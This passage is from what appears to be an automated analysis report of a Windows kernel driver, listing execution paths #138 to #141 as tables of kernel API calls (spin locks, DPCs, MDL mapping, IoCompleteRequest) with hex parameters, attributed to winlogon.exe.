| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x3f, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a774fc0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c1f8, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c1f8, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e1bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003afb5000, Tag = 0x0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #138 (length: 61, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 61 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00044551330, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c684e38 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a77e1bc |
| AfdBReceiveEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003e5f5550 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #139 (length: 48, count: 2, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 48 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c58d010, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c6b6e38 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a77e1bc |
| AfdBReceiveEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003e5f5550 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #140 (length: 20, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 20 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003e5f5550, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c708ef8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x60900 |
Execution Path #141 (length: 100, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 100 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003e5f5550, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c711e38 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a77e1bc |
| AfdBReceiveEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003afb5000, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
